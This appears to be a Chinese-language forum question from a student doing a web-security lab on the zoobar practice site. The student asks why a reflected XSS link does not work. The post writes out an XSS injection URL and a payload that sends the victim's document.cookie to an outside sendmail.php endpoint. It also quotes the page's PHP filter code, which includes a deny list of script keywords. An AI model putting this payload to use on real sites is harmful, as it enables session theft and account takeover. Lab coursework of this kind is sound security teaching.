我在学校项目中的任务是在受害者点击链接时制作一个链接(假设受害者登录到zoobar.org),窃取他们的cookie并通过电子邮件发送给自己。我精心设计了以下链接:
masked.masked.masked.se/zoobar/users.php?user="</input><script>alert("XSS")</script>
此链接成功创建了一个警告框。所以我基本上已经做了足够的运行任何带有链接的JavaScript。现在,我想在我的链接中插入一些东西,它提供了与此脚本相同的功能:
javascript:void((new Image()).src='http://www.masked.masked.se/utbildning/uni/kurser/course/
masked/Labs/WebAttacks/sendmail.php?' + 'to=me@uni.se' +
'&payload='+document.cookie + '&random=' + Math.random());
我想将此脚本插入到我的链接中,如下所示:
masked.masked.uni.se/zoobar/users.php?user="</input><script>javascript:void((new Image()).src='http://www.masked.uni.se/utbildning/uni/kurser/masked/masked/Labs/WebAttacks/sendmail.php?' + 'to=me@uni.se' + '&payload='+document.cookie + '&random=' + Math.random());</script>
但它没有给我发电子邮件!我向你保证邮件服务器或javascript本身没有任何问题,因为我之前使用了确切的脚本从zoobar网站的另一部分检索cookie。为什么我的链接不起作用?
编辑:
客户端代码: users.php的片段:
<?php
$selecteduser = $_GET['user'];
$sql = "SELECT Profile, Username, Zoobars FROM Person " .
"WHERE Username='" . addslashes($selecteduser) . "'";
$rs = $db->executeQuery($sql);
if ( $rs->next() ) { // Sanitize and display profile
list($profile, $username, $zoobars) = $rs->getCurrentValues();
echo "<div class=profilecontainer><b>Profile</b>";
$allowed_tags =
'<a><br><b><h1><h2><h3><h4><i><img><li><ol><p><strong><table>' .
'<tr><td><th><u><ul><em><span>';
$profile = strip_tags($profile, $allowed_tags);
$disallowed =
'javascript:|window|eval|setTimeout|setInterval|target|'.
'onAbort|onBlur|onChange|onClick|onDblClick|'.
'onDragDrop|onError|onFocus|onKeyDown|onKeyPress|'.
'onKeyUp|onLoad|onMouseDown|onMouseMove|onMouseOut|'.
'onMouseOver|onMouseUp|onMove|onReset|onResize|'.
'onSelect|onSubmit|onUnload';
$profile = preg_replace("/$disallowed/i", " ", $profile);
echo "<p id=profile>$profile</p></div>";
} else if($selecteduser) { // user parameter present but user not found
echo '<p class="warning" id="baduser">Cannot find that user.</p>';
}